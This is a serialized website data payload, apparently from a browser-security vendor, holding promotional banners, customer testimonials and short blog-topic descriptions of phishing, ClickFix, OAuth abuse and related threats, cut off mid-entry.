[{"data":1,"prerenderedAt":42182},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":36,"navbar-about-highlight":108,"navbar-resource-highlight":182,"blog-topics":226,"trust-badges":657,"solution-nav":678,"fa-icon-sharp-regular-faFishingRod":813,"fa-icon-solid-faUserSecret":817,"fa-icon-sharp-regular-faLaptopCode":819,"fa-icon-solid-faTabletScreenButton":821,"fa-icon-solid-faThumbsUp":823,"fa-icon-solid-faPlugCircleXmark":825,"fa-icon-sharp-regular-faPuzzlePiece":827,"fa-icon-solid-faFileCircleXmark":829,"fa-icon-solid-faGhost":832,"fa-icon-solid-faQrcode":835,"fa-icon-solid-faCookieBite":837,"fa-icon-sharp-regular-faUserSecret":839,"fa-icon-sharp-regular-faRadar":841,"fa-icon-sharp-regular-faSatelliteDish":843,"fa-icon-sharp-regular-faShieldCheck":845,"fa-icon-sharp-regular-faBrainCircuit":847,"fa-icon-solid-faMobileScreenButton":849,"fa-icon-brands-faChrome":851,"fa-icon-solid-faDisplay":853,"fa-icon-solid-faFilter":855,"fa-icon-solid-faCloudArrowUp":857,"blog-topic-malware-delivery":859},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"meta":14,"query":22,"data":23,"variations":28,"lastUpdated":29,"firstPublished":30,"testRatio":31,"createdBy":32,"lastUpdatedBy":33,"folders":34,"rev":35},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner","1c6207a5f24948ab82d4a0b17f251193","published",{"breakpoints":15,"hasAutosaves":19,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},768,640,320,true,"data","",[],{"link":24,"text":25,"type":26,"url":27},{},"Get our latest report analyzing browser attack techniques in 2026","web-banner","https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fbrowser-attacks-report",{},1774258294825,1742208637545,1,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],"brvjc1sslx8",{"createdBy":37,"createdDate":38,"data":39,"folders":94,"id":95,"lastUpdated":96,"lastUpdatedBy":97,"meta":98,"modelId":102,"name":103,"published":13,"query":104,"testRatio":31,"variations":105,"firstPublished":106,"stageModifiedSincePublish":6,"rev":107},"ST0tXQM8slWpFrmioqKHmENB2qe2",1774965361051,{"ctaText":40,"text":41,"url":21,"blocks":42,"state":90},"ewrererw","testrfesssssssssss",[43,70,78],{"@type":44,"@version":45,"id":46,"component":47,"responsiveStyles":60},"@builder.io\u002Fsdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":48,"tag":48,"options":49,"isRSC":59},"TopBannerContent",{"text":50,"ctaText":51,"url":52,"mainText":53,"cta":56},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks","Save Your Spot","https:\u002F\u002Fpushsecurity.com\u002Fwebinar\u002Fstate-of-browser-security",{"content":54,"fontSize":55},"\u003Cp class=\"\">Employees using shadow AI tools? Push blocks them in the browser and enforces your AI policy.\u003C\u002Fp>","text-base",{"content":57,"fontSize":55,"url":58},"\u003Cp class=\"\">Get a free trial →\u003C\u002Fp>","https:\u002F\u002Fpushsecurity.com\u002Flp\u002Fshadow-ai-trial",null,{"large":61},{"display":62,"flexDirection":63,"position":64,"flexShrink":65,"boxSizing":66,"marginTop":67,"marginBottom":67,"fontSize":68,"fontWeight":69},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"@type":44,"@version":45,"id":71,"component":72,"responsiveStyles":76},"builder-a2e1f4b9f30b464bb814d7f5de5b0aa7",{"name":73,"options":74,"isRSC":59},"Custom Code",{"code":75,"scriptsClientOnly":6},"\u003Cstyle>\n  .top-banner.bg-web-orange{background:rgb(114, 79, 255);}\n\u003C\u002Fstyle>\n",{"large":77},{"display":62,"flexDirection":63,"position":64,"flexShrink":65,"boxSizing":66},{"id":79,"@type":44,"tagName":80,"properties":81,"responsiveStyles":85},"builder-pixel-65og51xnky7","img",{"src":82,"aria-hidden":83,"alt":21,"role":84,"width":65,"height":65},"https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fpixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":86},{"height":65,"width":65,"display":87,"opacity":65,"overflow":88,"pointerEvents":89},"block","hidden","none",{"deviceSize":91,"location":92},"large",{"path":21,"query":93},{},[],"fd266d0172cc47429be7ad10f48c99ad",1787595768418,"tFqFyIzyczYOCRogcShKk6KBmEB2",{"breakpoints":99,"hasAutosaves":19,"hasErrors":6,"hasLinks":6,"kind":100,"lastPreviewUrl":101},{"medium":16,"small":17,"xsmall":18},"component","https:\u002F\u002Fpushsecurity.com\u002F?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CcreateProjects%2CsendPullRequests%2CfusionHostingPublish&builder.user.role.name=Designer&builder.user.role.id=creator&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","0678d178ec8b41efb8a23c09dba7874d","always visible banner",[],{},1774968080803,"y4fj9dbjb7k",[109,145],{"createdBy":32,"createdDate":110,"data":111,"folders":134,"id":135,"lastUpdated":136,"lastUpdatedBy":32,"meta":137,"modelId":139,"name":140,"published":13,"query":141,"stageModifiedSincePublish":6,"testRatio":31,"variations":142,"firstPublished":143,"rev":144},1776247359804,{"link":112,"testimonial":113,"testimonialLink":133,"type":116},{},{"@type":114,"id":115,"model":116,"value":117},"@builder.io\u002Fcore:Reference","f028f2b685bb47cd8bf9e82a26dd5a79","testimonial",{"query":118,"folders":119,"createdDate":120,"id":115,"name":121,"modelId":122,"published":13,"data":123,"variations":127,"lastUpdated":128,"firstPublished":129,"testRatio":31,"createdBy":37,"lastUpdatedBy":37,"meta":130,"rev":132},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":124,"jobTitle":125,"quote":121,"image":126},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C\u002Fp>","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,{"kind":20,"lastPreviewUrl":21,"breakpoints":131,"hasAutosaves":19},{"small":17,"medium":16},"8lr4aug0kgg","\u002Fcustomer-stories\u002Finductive-automation",[],"9136a8f18b3b4a6ba29b8653a99372b1",1776247404986,{"breakpoints":138,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"20d9eaa352304613b3d1a794b400703d","testimonial-inductive-automation",[],{},1776247404973,"tmziibs9ga9",{"createdBy":32,"createdDate":146,"data":147,"folders":174,"id":175,"lastUpdated":176,"lastUpdatedBy":32,"meta":177,"modelId":139,"name":172,"published":13,"query":179,"stageModifiedSincePublish":6,"testRatio":31,"variations":180,"firstPublished":181,"rev":144},1776255761419,{"description":148,"image":149,"link":150,"testimonial":153,"title":172,"type":173},"Learn about the latest techniques being used in the wild.","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9",{"text":151,"url":152},"Download now","\u002Fresources\u002Fbrowser-attacks-report",{"@type":114,"id":154,"model":116,"value":155},"192acbb1f9ca4cac918c0ec435a8bae3",{"query":156,"folders":157,"createdDate":158,"id":154,"name":159,"modelId":122,"published":13,"data":160,"variations":166,"lastUpdated":167,"firstPublished":168,"testRatio":31,"createdBy":37,"lastUpdatedBy":32,"meta":169,"rev":171},[],[],1728981467463,"Push does for identity what CrowdStrike did for the endpoint",{"video":161,"jobTitle":162,"author":163,"qoute":21,"quote":164,"image":165},"https:\u002F\u002Fcdn.builder.io\u002Fo\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8b30e8ca50064058bbaef0f3c6164575%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=8b30e8ca50064058bbaef0f3c6164575&alt=media&optimized=true","\u003Cp>Deputy CISO at Microsoft\u003C\u002Fp>\u003Cp>Former LinkedIn, Slack, Palantir\u003C\u002Fp>","Geoff Belknap","Push does for identity what CrowdStrike did for the endpoint.","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F748f0ad0a5064a00a13f4721fcc8dea1",{},1742902158597,1728981782923,{"kind":20,"lastPreviewUrl":21,"breakpoints":170,"hasAutosaves":19},{"small":17,"medium":16},"w423t83vzcq","Report: 2026 Browser Attack Techniques","resource",[],"05a9322735fc427db12e2740e4302300",1776255810913,{"breakpoints":178,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},[],{},1776255810900,[183,205],{"createdBy":32,"createdDate":184,"data":185,"folders":195,"id":196,"lastUpdated":197,"lastUpdatedBy":32,"meta":198,"modelId":200,"name":172,"published":13,"query":201,"stageModifiedSincePublish":6,"testRatio":31,"variations":202,"firstPublished":203,"rev":204},1776256900280,{"description":148,"image":149,"link":186,"testimonial":187,"title":172,"type":173},{"text":151,"url":152},{"@type":114,"id":154,"model":116,"value":188},{"query":189,"folders":190,"createdDate":158,"id":154,"name":159,"modelId":122,"published":13,"data":191,"variations":192,"lastUpdated":167,"firstPublished":168,"testRatio":31,"createdBy":37,"lastUpdatedBy":32,"meta":193,"rev":171},[],[],{"video":161,"jobTitle":162,"author":163,"qoute":21,"quote":164,"image":165},{},{"kind":20,"lastPreviewUrl":21,"breakpoints":194,"hasAutosaves":19},{"small":17,"medium":16},[],"1f429607996e4e5fae8fe3f9b9610e55",1776256937553,{"breakpoints":199,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"4829faa81e7c4ee8bd2d000e160e8d3c",[],{},1776256937540,"h00i46zz8yj",{"createdBy":32,"createdDate":206,"data":207,"folders":217,"id":218,"lastUpdated":219,"lastUpdatedBy":32,"meta":220,"modelId":200,"name":222,"published":13,"query":223,"stageModifiedSincePublish":6,"testRatio":31,"variations":224,"firstPublished":225,"rev":204},1776256949234,{"link":208,"testimonial":209,"testimonialLink":133,"type":116},{},{"@type":114,"id":115,"model":116,"value":210},{"query":211,"folders":212,"createdDate":120,"id":115,"name":121,"modelId":122,"published":13,"data":213,"variations":214,"lastUpdated":128,"firstPublished":129,"testRatio":31,"createdBy":37,"lastUpdatedBy":37,"meta":215,"rev":132},[],[],{"author":124,"jobTitle":125,"quote":121,"image":126},{},{"kind":20,"lastPreviewUrl":21,"breakpoints":216,"hasAutosaves":19},{"small":17,"medium":16},[],"ce043785b71b4ece98eac811ecf4ba10",1776256974140,{"breakpoints":221,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"inductive-automation",[],{},1776256974130,{"id":227,"extension":228,"items":229,"meta":654,"stem":655,"__hash__":656},"blogTopics\u002Fblogtopics.json","json",[230,239,248,257,266,275,284,293,302,311,320,329,338,347,356,365,374,383,392,401,410,419,428,437,445,454,463,472,481,490,498,507,516,525,534,542,551,559,568,577,586,594,602,610,618,627,636,645],{"sys":231,"faqItemsCollection":233,"name":235,"slug":236,"tier":31,"intro":237,"faqTitle":59,"postCount":238,"hasPage":19},{"id":232},"topic-ai",{"items":234},[],"AI","ai","AI is reshaping both sides of the security equation: employees adopt AI tools faster than security teams can track them, while attackers use AI to scale and automate campaigns. Shadow AI adoption may now outpace wider shadow SaaS, and attackers are already turning AI chatbot platforms into malware delivery channels. Push has researched the offensive potential of computer-using agents and now applies AI agents to its own threat hunting. This hub covers AI as risk, target, and defensive tool.",22,{"sys":240,"faqItemsCollection":242,"name":244,"slug":245,"tier":45,"intro":246,"faqTitle":59,"postCount":247,"hasPage":19},{"id":241},"topic-ai-attacks",{"items":243},[],"AI attacks","ai-attacks","AI attacks run in both directions: attackers using AI to scale phishing, malware delivery, and identity attacks, and AI platforms themselves becoming the attack surface. Push has researched how computer-using agents can automate identity attacks, and has seen the poisoned tenant technique it coined used against its own employees in the wild.",23,{"sys":249,"faqItemsCollection":251,"name":253,"slug":254,"tier":45,"intro":255,"faqTitle":59,"postCount":256,"hasPage":19},{"id":250},"topic-ai-governance",{"items":252},[],"AI governance","ai-governance","AI governance is how organizations set and enforce rules for workplace AI use — which tools are allowed, what data can enter them, and how to evidence it to regulators. With US, EU, and UK AI regulations converging on obligations most organizations can’t yet meet, Push’s research makes the case that enforcement starts in the browser, where AI tools are actually used.",9,{"sys":258,"faqItemsCollection":260,"name":262,"slug":263,"tier":45,"intro":264,"faqTitle":59,"postCount":265,"hasPage":19},{"id":259},"topic-aitm",{"items":261},[],"AiTM phishing","aitm","Adversary-in-the-middle (AiTM) phishing proxies a real login page through an attacker-controlled site, capturing credentials, MFA codes, and session tokens in real time to bypass multi-factor authentication. Push’s research into kits like Evilginx and Sneaky2FA documents how they evade URL- and signature-based detection — and why analyzing toolkit behavior in the browser catches attacks that blocklists miss.",78,{"sys":267,"faqItemsCollection":269,"name":271,"slug":272,"tier":45,"intro":273,"faqTitle":59,"postCount":274,"hasPage":6},{"id":268},"topic-bec",{"items":270},[],"BEC","bec","Business email compromise (BEC) turns a hijacked mailbox into a fraud tool: attackers use mail rules, auto-forwarding, and payment redirection to steal money while staying invisible to the account owner. Alongside a first-hand case study of a BEC attack that nearly cost an engineering firm millions, Push breaks down these mailbox persistence tricks and how to detect them.",4,{"sys":276,"faqItemsCollection":278,"name":280,"slug":281,"tier":31,"intro":282,"faqTitle":59,"postCount":283,"hasPage":19},{"id":277},"topic-browser-attacks",{"items":279},[],"Browser attacks","browser-attacks","Browser attacks target users through the web pages, sessions, and extensions they rely on every day — bypassing endpoint and network defenses that never see inside the browser. Techniques like AiTM phishing kits, ClickFix-style copy-paste attacks, OAuth consent abuse, malvertising, and browser sync abuse have become a leading path to account takeover. Push researchers analyze these attacks in the wild, from infiltrating criminal phishing panels to dissecting toolkits like ConsentFix and Sneaky2FA. Use this hub to track how the techniques evolve and how to defend against them.",122,{"sys":285,"faqItemsCollection":287,"name":289,"slug":290,"tier":45,"intro":291,"faqTitle":59,"postCount":292,"hasPage":19},{"id":286},"topic-browser-extensions",{"items":288},[],"Browser extensions","browser-extensions","Browser extensions cut both ways for security teams: malicious or compromised extensions are a growing attack vector, while an extension is also the lightest-weight way to deploy security controls into the browsers employees already use. These posts cover both sides — extension-borne risks like browser sync attacks and the limits of risk scoring, and how Push uses its extension to detect threats and block risky extensions.",31,{"sys":294,"faqItemsCollection":296,"name":298,"slug":299,"tier":31,"intro":300,"faqTitle":59,"postCount":301,"hasPage":19},{"id":295},"topic-browser-security",{"items":297},[],"Browser security","browser-security","Work now happens in the browser, making browser security — visibility and control at the point where users meet the web — a core layer of enterprise defense. Endpoint, network, and email tools miss attacks that unfold inside the browser session, from AiTM phishing to risky extensions and shadow SaaS. Push has published extensively on choosing between enterprise browsers and browser extensions, using browser telemetry, and making the business case for browser security. Start here for both strategy and hands-on guidance.",129,{"sys":303,"faqItemsCollection":305,"name":307,"slug":308,"tier":45,"intro":309,"faqTitle":59,"postCount":310,"hasPage":19},{"id":304},"topic-casb",{"items":306},[],"CASB","casb","Cloud access security brokers (CASBs) govern cloud app usage through API integrations and network proxies — an approach that works for sanctioned apps but struggles with the long tail of shadow SaaS employees adopt on their own. Because every SaaS signup happens in a browser, Push captures that adoption in real time at the point of login, and these posts cover what proxy-based discovery misses.",12,{"sys":312,"faqItemsCollection":314,"name":316,"slug":317,"tier":45,"intro":318,"faqTitle":59,"postCount":319,"hasPage":19},{"id":313},"topic-clickfix",{"items":315},[],"ClickFix","clickfix","ClickFix attacks trick users into copying and running malicious commands themselves — typically through fake CAPTCHA, error, or fix-it prompts — so malware executes without a download for security tools to scan. Push researchers track the technique’s evolution in the wild and identified the ConsentFix and InstallFix variants, which extend it to OAuth consent grants and fake install guides.",40,{"sys":321,"faqItemsCollection":323,"name":325,"slug":326,"tier":45,"intro":327,"faqTitle":59,"postCount":328,"hasPage":19},{"id":322},"topic-credential-phishing",{"items":324},[],"Credential phishing","credential-phishing","Credential phishing steals usernames and passwords through fake login pages impersonating the services employees use, handing attackers direct access to corporate accounts. Attackers don’t hack in — they log in. Push’s browser extension analyzes login pages as users actually see them, blocking cloned pages and stopping employees from entering company passwords on lookalike sites.",90,{"sys":330,"faqItemsCollection":332,"name":334,"slug":335,"tier":45,"intro":336,"faqTitle":59,"postCount":337,"hasPage":19},{"id":331},"topic-credential-stuffing",{"items":333},[],"Credential stuffing","credential-stuffing","Credential stuffing is an attack where criminals replay username-password pairs stolen from one breach against other services, exploiting password reuse to take over accounts. Major breaches have shown how far a single set of stolen credentials can travel. Push detects verified stolen credentials by comparing employee passwords against breach datasets and dark-web threat intelligence, eliminating false positives.",64,{"sys":339,"faqItemsCollection":341,"name":343,"slug":344,"tier":31,"intro":345,"faqTitle":59,"postCount":346,"hasPage":19},{"id":340},"topic-detection-and-response",{"items":342},[],"Detection & response","detection-and-response","Detection and response is being reshaped as attacks move into the browser, where EDR, SIEM, and network tools have limited visibility. Modern phishing kits evade signature-based detection, and most malicious pages have never been seen before — so technique-level, in-browser detection matters more than known-bad indicators. Push’s work here spans high-fidelity browser telemetry, session token theft detection, and agentic threat hunting, plus practical IR guidance for compromised SaaS accounts and malicious OAuth apps. These posts cover both the philosophy and the workflows.",102,{"sys":348,"faqItemsCollection":350,"name":352,"slug":353,"tier":45,"intro":354,"faqTitle":59,"postCount":355,"hasPage":19},{"id":349},"topic-detection-engineering",{"items":351},[],"Detection engineering","detection-engineering","Detection engineering turns threat research into reliable, high-fidelity detections — and as AI accelerates the churn of attacker infrastructure, indicator-based detection is collapsing in favor of technique-level approaches. Here you’ll find teardowns of AiTM kits, ClickFix pages, and malvertising campaigns, alongside Push’s own account of building an agentic threat hunting pipeline that turns hunts into shipped detections.",43,{"sys":357,"faqItemsCollection":359,"name":361,"slug":362,"tier":45,"intro":363,"faqTitle":59,"postCount":364,"hasPage":19},{"id":358},"topic-device-code-phishing",{"items":360},[],"Device code phishing","device-code-phishing","Device code phishing abuses the OAuth device authorization flow: attackers generate a legitimate sign-in code, trick the victim into entering it on the vendor’s real login page, and walk away with access tokens — no fake site or password capture required. Push research tracked a sharp spike in adoption during 2026 as attackers use the technique to sidestep standard access controls.",24,{"sys":366,"faqItemsCollection":368,"name":370,"slug":371,"tier":45,"intro":372,"faqTitle":59,"postCount":373,"hasPage":19},{"id":367},"topic-dlp",{"items":369},[],"DLP","dlp","Data loss prevention (DLP) is the practice of stopping sensitive data from leaving your control — a problem that has shifted from email and endpoints to the browser, where employees move data into SaaS and AI tools. Push applies controls at that point of use, from keeping corporate credentials out of personal password managers to governing what flows into unsanctioned apps.",15,{"sys":375,"faqItemsCollection":377,"name":379,"slug":380,"tier":45,"intro":381,"faqTitle":59,"postCount":382,"hasPage":19},{"id":376},"topic-edr",{"items":378},[],"EDR","edr","Endpoint detection and response (EDR) watches processes, files, and memory on the device — a vantage point that never sees the phishing pages, stolen sessions, and identity attacks playing out inside the browser. That’s not an EDR failure; attackers have simply moved where it can’t follow. These posts map that gap and show how Push pairs browser-level detection and response with endpoint security to close it.",25,{"sys":384,"faqItemsCollection":386,"name":388,"slug":389,"tier":45,"intro":390,"faqTitle":59,"postCount":391,"hasPage":19},{"id":385},"topic-enterprise-browser",{"items":387},[],"Enterprise browser","enterprise-browser","An enterprise browser is a standalone, security-hardened browser that organizations deploy in place of Chrome, Edge, or other defaults. The real buying question is whether replacing the browser beats securing the browsers employees already use — a trade-off these posts examine directly, alongside analysis of Omdia’s secure enterprise browser market report and Push’s framework for weighing full browsers against extension-based deployment.",8,{"sys":393,"faqItemsCollection":395,"name":397,"slug":398,"tier":45,"intro":399,"faqTitle":59,"postCount":400,"hasPage":19},{"id":394},"topic-ghost-logins",{"items":396},[],"Ghost logins","ghost-logins","Ghost logins are overlooked authentication routes into an account — like a password login lingering behind SSO, or a forgotten secondary auth method — that attackers exploit for account takeover and persistence. Push coined the term after research showing how these forgotten login paths let attackers sidestep the MFA and SSO controls guarding an account’s primary sign-in method.",48,{"sys":402,"faqItemsCollection":404,"name":406,"slug":407,"tier":45,"intro":408,"faqTitle":59,"postCount":409,"hasPage":19},{"id":403},"topic-identity-attacks",{"items":405},[],"Identity attacks","identity-attacks","Identity attacks target user accounts rather than infrastructure — phishing credentials, stealing sessions, abusing OAuth grants — because logging in is easier than hacking in. Identity-based techniques are now the leading cause of breaches. Push’s offensive research maps these techniques continuously, coining attacks like SAMLjacking and the poisoned tenant before they appeared in the wild.",58,{"sys":411,"faqItemsCollection":413,"name":415,"slug":416,"tier":31,"intro":417,"faqTitle":59,"postCount":418,"hasPage":19},{"id":412},"topic-identity-security",{"items":414},[],"Identity security","identity-security","Identity security is the practice of protecting workforce accounts, credentials, and sessions — the primary route attackers now use to breach organizations. Instead of hacking in, attackers log in: through phished credentials, stolen session tokens, MFA bypass, and forgotten ghost logins. Push’s research team documents these techniques continuously, from cross-IdP impersonation and SAMLjacking to analyses of major identity-driven breaches. This hub collects that research alongside practical guidance on MFA, SSO, and stopping account takeover.",154,{"sys":420,"faqItemsCollection":422,"name":424,"slug":425,"tier":45,"intro":426,"faqTitle":59,"postCount":427,"hasPage":19},{"id":421},"topic-infostealer",{"items":423},[],"Infostealer","infostealer","Infostealers are malware built to harvest saved passwords, cookies, and session tokens from infected devices, supplying the stolen credentials behind some of the most consequential breaches of recent years. Push traces the ecosystem trading this data and checks employee passwords against threat intel feeds, flagging verified stolen credentials before attackers can log in with them.",53,{"sys":429,"faqItemsCollection":431,"name":433,"slug":434,"tier":45,"intro":435,"faqTitle":59,"postCount":436,"hasPage":19},{"id":430},"topic-legitimate-service-abuse",{"items":432},[],"Legitimate service abuse","legitimate-service-abuse","Legitimate service abuse means staging attacks on trusted platforms — Google Ads, AI chatbot share pages, office.com links, Slack, SaaS tenants — so malicious content inherits the reputation of the service hosting it. Push research has documented the pattern repeatedly, from malvertising run through hijacked Google Ad Manager accounts to phishing links generated by Active Directory Federation Services.",29,{"sys":438,"faqItemsCollection":440,"name":442,"slug":443,"tier":45,"intro":444,"faqTitle":59,"postCount":292,"hasPage":19},{"id":439},"topic-malvertising",{"items":441},[],"Malvertising","malvertising","Malvertising uses paid search and display ads to put phishing pages and malware in front of users, often by impersonating trusted brands at the top of Google results. Push tracks these campaigns continuously — intercepting live attacks spoofing well-known brands — and has documented how criminals hijack Google Ads accounts to fund and run them.",{"sys":446,"faqItemsCollection":448,"name":450,"slug":451,"tier":45,"intro":452,"faqTitle":59,"postCount":453,"hasPage":19},{"id":447},"topic-malware-delivery",{"items":449},[],"Malware delivery","malware-delivery","Malware delivery has moved into the browser: rather than email attachments, attackers now rely on malvertising, fake install guides, and ClickFix-style copy-paste lures to get code running on endpoints. Push research on techniques like InstallFix maps the playbook, and in-browser detection of malicious copy and paste blocks these attacks before commands reach the endpoint.",14,{"sys":455,"faqItemsCollection":457,"name":459,"slug":460,"tier":45,"intro":461,"faqTitle":59,"postCount":462,"hasPage":19},{"id":456},"topic-mfa",{"items":458},[],"MFA","mfa","Multi-factor authentication (MFA) requires a second proof of identity beyond a password, and it remains one of the most effective controls against account takeover. Regulators from Cyber Essentials to NYDFS now mandate it across cloud services. Push enforces MFA in the browser on third-party apps — even those with no native enforcement option — and shows security teams where coverage gaps remain.",83,{"sys":464,"faqItemsCollection":466,"name":468,"slug":469,"tier":45,"intro":470,"faqTitle":59,"postCount":471,"hasPage":19},{"id":465},"topic-mfa-bypass",{"items":467},[],"MFA bypass","mfa-bypass","MFA bypass covers the techniques attackers use to defeat multi-factor authentication — AiTM phishing kits, consent phishing, device code phishing, and MFA downgrade attacks among them. None of these break the second factor; they route around it. Push researchers regularly get hands-on with phishing kits like Evilginx and Sneaky2FA, analyzing how these attacks work in the wild and how they evolve.",60,{"sys":473,"faqItemsCollection":475,"name":477,"slug":478,"tier":45,"intro":479,"faqTitle":59,"postCount":480,"hasPage":19},{"id":474},"topic-non-email-phishing",{"items":476},[],"Non-email phishing","non-email-phishing","Non-email phishing delivers malicious links through channels your secure email gateway never sees — social media messages, IM apps like Slack and Teams, search ads, and SMS. Push has intercepted live campaigns arriving via LinkedIn DMs, malvertising, and messaging platforms, which is why it detects phishing pages in the browser at the point of click, regardless of delivery channel.",52,{"sys":482,"faqItemsCollection":484,"name":486,"slug":487,"tier":45,"intro":488,"faqTitle":59,"postCount":489,"hasPage":19},{"id":483},"topic-oauth-abuse",{"items":485},[],"OAuth abuse","oauth-abuse","OAuth abuse is attackers exploiting app-to-app authorization — consent phishing, malicious OAuth apps, stolen tokens, and device code flows — to gain persistent access to cloud tenants without touching a password or MFA prompt. Push tracks these techniques continuously and discovered ConsentFix, a browser-native attack in the wild that pairs OAuth consent phishing with a ClickFix-style prompt.",70,{"sys":491,"faqItemsCollection":493,"name":495,"slug":496,"tier":45,"intro":497,"faqTitle":59,"postCount":247,"hasPage":19},{"id":492},"topic-passkeys",{"items":494},[],"Passkeys","passkeys","Passkeys are phishing-resistant credentials that replace passwords with cryptographic key pairs bound to a user’s device. They defeat conventional credential phishing, but attackers adapt: Push research has documented MFA downgrade, app-specific password phishing, and device code phishing being used in the wild to route around passkey-protected accounts. Deploying passkeys is step one; closing those fallback paths is step two.",{"sys":499,"faqItemsCollection":501,"name":503,"slug":504,"tier":45,"intro":505,"faqTitle":59,"postCount":506,"hasPage":19},{"id":500},"topic-password-security",{"items":502},[],"Password security","password-security","Password security is the practice of keeping workforce credentials strong, unique, and out of attackers’ hands — still a frontline defense while most SaaS logins depend on passwords. Expiration policies don’t fix weak or reused passwords; visibility does. Push observes real logins in the browser to flag weak, reused, and breached passwords and guide employees to reset them on any app.",80,{"sys":508,"faqItemsCollection":510,"name":512,"slug":513,"tier":45,"intro":514,"faqTitle":59,"postCount":515,"hasPage":19},{"id":509},"topic-phaas",{"items":511},[],"PhaaS","phaas","Phishing-as-a-service (PhaaS) platforms sell ready-made phishing kits, hosted infrastructure, and management panels on subscription, letting low-skill criminals run MFA-bypassing campaigns at scale. Kits like Evilginx, Tycoon2FA, Sneaky2FA, FlowerStorm, and EvilTokens each add their own evasion and session-theft capabilities, and new entrants appear regularly. Push researchers continuously get hands-on with these tools — investigating attacks in the wild, reverse-engineering kit behavior, and turning that research into detections.",41,{"sys":517,"faqItemsCollection":519,"name":521,"slug":522,"tier":31,"intro":523,"faqTitle":59,"postCount":524,"hasPage":19},{"id":518},"topic-phishing",{"items":520},[],"Phishing","phishing","Phishing remains the most common way attackers compromise business accounts — and it has moved far beyond suspicious emails. Modern campaigns use AiTM toolkits that bypass MFA, consent phishing against OAuth, device code phishing, and lures delivered through malvertising, LinkedIn, and Slack. Push detects and blocks these attacks in the browser, and its researchers publish teardowns of live campaigns and kits like Evilginx and Sneaky2FA. Read on for how phishing actually works today and what stops it.",93,{"sys":526,"faqItemsCollection":528,"name":530,"slug":531,"tier":45,"intro":532,"faqTitle":59,"postCount":533,"hasPage":19},{"id":527},"topic-public-breach",{"items":529},[],"Public breach","public-breach","Public breaches are the disclosed incidents that show how attacks actually unfold once the headlines fade. Push’s breach analyses keep finding identity at the entry point: stolen credentials, OAuth abuse, and missing MFA recur across the incidents analyzed here.",30,{"sys":535,"faqItemsCollection":537,"name":539,"slug":540,"tier":45,"intro":541,"faqTitle":59,"postCount":453,"hasPage":19},{"id":536},"topic-ransomware",{"items":538},[],"Ransomware","ransomware","Ransomware attacks increasingly begin with an identity, not an exploit: stolen credentials, MFA bypass, and help desk scams give operators their initial foothold. The analysis here follows that front end of the kill chain — how identity compromise leads to ransomware deployment, and the breaches driving regulators toward tighter MFA requirements.",{"sys":543,"faqItemsCollection":545,"name":547,"slug":548,"tier":31,"intro":549,"faqTitle":59,"postCount":550,"hasPage":19},{"id":544},"topic-saas-security",{"items":546},[],"SaaS security","saas-security","SaaS security means protecting the sprawl of cloud apps, accounts, and integrations your employees adopt — often without IT ever knowing. Shadow SaaS, risky OAuth grants, ghost logins, and unmanaged third-party access create attack paths traditional controls can’t see, as recent high-profile breaches have demonstrated. Building on the original SaaS attack matrix, Push continues to map SaaS-native attack techniques alongside practical guides for discovering and securing unsanctioned apps, and this hub gathers all of it.",97,{"sys":552,"faqItemsCollection":554,"name":556,"slug":557,"tier":45,"intro":558,"faqTitle":59,"postCount":274,"hasPage":6},{"id":553},"topic-security-training",{"items":555},[],"Security training","security-training","Security training aims to teach employees to recognize and avoid attacks — yet modern phishing routinely fools even seasoned security professionals. Push argues that training budgets work harder as real-time, in-browser intervention: guardrails and warnings at the moment of risk, rather than lessons employees must recall under pressure.",{"sys":560,"faqItemsCollection":562,"name":564,"slug":565,"tier":45,"intro":566,"faqTitle":59,"postCount":567,"hasPage":19},{"id":561},"topic-seo-poisoning",{"items":563},[],"SEO poisoning","seo-poisoning","SEO poisoning manipulates search engine results so malicious pages rank prominently for the software, tools, or services users are actively searching for, turning a routine search into an infection vector. It often pairs with malvertising and ClickFix-style payloads — Push has documented attackers abusing shared pages on legitimate AI chatbot domains to deliver malware from trusted 